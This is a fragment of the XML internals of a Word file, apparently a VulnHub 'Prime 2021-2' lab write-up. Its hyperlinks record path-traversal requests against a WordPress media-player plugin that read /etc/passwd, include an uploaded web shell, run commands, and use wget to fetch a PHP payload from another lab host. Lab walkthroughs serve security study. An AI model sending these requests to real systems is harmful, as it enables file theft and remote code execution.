    <w:rsid w:val="00DE56B3"/>
    <w:rsid w:val="00F83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A0A61"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB807E7C-A226-43DD-81A8-FF2DE5474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396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39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hyperlink" Target="http://192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg=../../../../../../../../../../etc/passwd" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg=../../../../../../../../../../home//jarves/upload/shell.php&amp;cmd=cat%20/tmp/1.php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192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg=../../../../../../../../../../home//jarves/upload/shell.php&amp;cmd=whoami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hyperlink" Target="http://192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg=../../../../../../../../../../tmp/1.php" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com/entry/prime-2021-2,696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://192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg=../../../../../../../../../../home//jarves/upload/shell.php&amp;cmd=wget%20http://192.168.21.131:8000/1.php%20-O%20/tmp/1.php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15</Pages>
  <Words>364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obrine him</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>obrine him</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-10T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-10T07:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>